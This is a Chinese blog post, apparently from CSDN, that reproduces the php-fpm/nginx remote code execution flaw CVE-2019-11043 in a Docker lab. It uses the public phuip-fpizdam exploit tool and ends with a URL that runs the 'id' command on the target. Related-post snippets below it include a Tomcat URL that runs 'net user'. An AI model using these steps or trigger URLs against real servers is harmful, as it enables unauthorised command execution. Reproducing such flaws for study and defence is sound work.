CVE-2019-11043(php-fpm & nginx RCE远程命令执行漏洞复现)

最新推荐文章于 2024-06-05 09:06:29 发布
最新推荐文章于 2024-06-05 09:06:29 发布
阅读量3.2k 收藏 2
点赞数
分类专栏: # poc+漏洞 文章标签: 漏洞复现 php 远程命令执行 rce
本文为博主原创文章,未经博主允许可以转载。
本文链接:https://blog.csdn.net/helloexp/article/details/102785860
版权

写在前边 利用条件比较苛刻,各位看官看一下就好了
利用条件在这里插入图片描述

复现环境
ubuntu:Linux kk-machine 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
go:go version go1.13.3 linux/amd64

go 环境安装

go 的安装过程还是费了一点时间的,主要是之前只是简单的使用为主
下载源码安装包

cd /opt
wget https://dl.google.com/go/go1.13.3.linux-amd64.tar.gz
tar zxvf go1.13.3.linux-amd64.tar.gz

配置go 环境变量

export GOROOT=/opt/go
export GOPATH=/home/kk/work
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

新建go 工作目录

mkdir -p /home/kk/work

docker 安装

# Install pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3
# Install the latest version docker
curl -s https://get.docker.com/ | sh           【-s  代表silent 静默模式,建议不要加上】
# Run docker service
service docker start
# Install docker compose
pip install docker-compose

漏洞复现过程

下载攻击脚本

go get github.com/neex/phuip-fpizdam     # 默认下载之后会保存到前面配置的go 的工作目录

在这里插入图片描述
配置docker 靶机

git clone https://github.com/neex/phuip-fpizdam.git
cd reproducer/
docker build -t reproduce-cve-2019-11043 .      # 注意后面有个点
docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043    # 运行靶机

靶机运行之后查看是否运行正常
在这里插入图片描述
靶机运行正常,利用poc 工具攻击靶机【验证服务器有漏洞的输出界面如下】
在这里插入图片描述
在这里插入图片描述
第二次重新运行脚本,脚本会一直向服务器发包,这时在浏览器打开靶机地址,直接执行命令即可(url如下要多试几次才可以)

http://192.168.124.141:8080/script.php?a=id

利用成功结果如图
在这里插入图片描述

复现完成

以上
BR

阿雷由
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 427
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
CVE-2019-11043 漏洞复现
m0_46580995的博客
07-19 1647
PHP-FPM 远程代码执行漏洞CVE-2019-11043漏洞介绍 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 复现环境vnlhub 复现exp需要安装go语言环境 apt-get install golang -y 然后换个源(国内) go en
PHP-fpm远程代码执行漏洞(CVE-2019-11043)
老北京砸酱锤的博客
06-22 976
漏洞介绍 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行Nginx+php-fpm的服务器,在使用如下配置的时候,可能存在远程代码执行漏洞漏洞复现 使用vulhub复现漏洞,进入CVE-2019-11043文件夹下(cd /home/apple/vulhub/ph
cve漏洞复现php,CVE-2019-11043 远程代码执行漏洞复现
weixin_30405507的博客
03-19 156
影响范围在使用 Nginx+php+fpm 的服务器上,使用如下配置,都有可能存在远程代码执行漏洞location ~ [^/]\.php(/|$) {...fastcgi_split_path_info ^(.+?\.php)(/.*)$;fastcgi_param PATH_INFO $fastcgi_path_info;fastcgi_pass php:9000;}漏洞复现这...
PHP--远程命令执行漏洞CVE-2018-19518复现
从不专注的人的博客
06-28 586
目录漏洞介绍漏洞复现进入容器移除环境 漏洞介绍 -php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。 -debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。 -ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行
nginx文件路径处理远程命令执行漏洞(转)
weixin_33834679的博客
01-18 844
转自:http://www.safe.sh/security/?type=detail&id=1606另参考:http://hi.baidu.com/higkoo/item/ed1e0cc9b9d7b3d6964452f1影响版本:Igor Sysoev nginx 0.8.xIgor Sysoev nginx 0.7.xIgor Sysoev nginx 0.6.x...
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github....fpizdamale@Pentest ~/go lsbin ...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
NGINX-RCE:nginxrce漏洞利用
04-04
NGINX-RCE nginxrce漏洞利用 怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
CTFSHOW PHPCVE复现
snowlyzz的博客
10-03 892
PHPCVE 复现学习
CTFSHOW--PHPCVE复现
qq_49422880的博客
02-22 3285
CTFSHOW--PHPCVE复现web311[CVE-2019-11043]web312(CVE-2018-19518)web313(CVE-2018-19518)web314:(日志文件包含)web315:(XDebug 远程调试漏洞) web311[CVE-2019-11043] web312(CVE-2018-19518) 同样,没有任何的界面就直接抓包,发现是X-Powered-By: PHP/5.6.38,网上搜索发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。 简介:
nginx解析漏洞复现
WY92139010的博客
07-22 299
nginx解析漏洞复现 一、漏洞描述 该漏洞nginxphp版本无关,属于用户配置不当造成的解析漏洞 二、漏洞原理 1、 由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如...
nginx常见漏洞解析_nginx漏洞(2),2024年最新【一篇文章搞懂
2401_84181340的博客
04-10 2947
中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。但是在开发使用过程中也不乏官方程序自身的一些安全问题。我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了解程度,只谈发现漏洞后如何处理,便是一团乱。开发商推卸说这并不是代码上的问题,他们完全是按照安全开发流程(SDL)走的,所以跟他无关。
Nginx漏洞解析及复现
最新发布
A526847的博客
06-05 2250
开启这一选项有什么用呢?看名字就知道是对文件路径进行“修理”。举个例子,当php遇到 文件路径“/aaa.xxx/bbb.yyy/ccc.zzz”时,若“/aaa.xxx/bbb.yyy/ccc.zzz”不存在,则会去掉最后的 “/ccc.zzz”,然后判断“/aaa.xxx/bbb.yyy”是否存在,若存在,则把“/aaa.xxx/bbb.yyy”当做文件 “/aaa.xxx/bbb.yyy/ccc.zzz”,若“/aaa.xxx/bbb.yyy”仍不存在,则继续去掉“/bbb.yyy”,以此类推。
CVE2019-11043漏洞复现
daqiangdetianxia的博客
10-05 531
知其然,知其所以然。 原理:https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf docker使用别人搭建好的环境 git clone https://github.com/vulhub/vulhub.git //git将vulhub下载到本地 cd vulhub/php/CVE-2019-11043 //进入CVE-2019-11043的目录 docker-compose up -d //下载.
NginxWEBUI框架RCE任意命令执行漏洞深度分析(含Poc和EXP)
qq_29616295的博客
08-18 1142
NginxWEBUI任意命令执行漏洞深度解析
CVE-2019-19781 Citrix漏洞远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值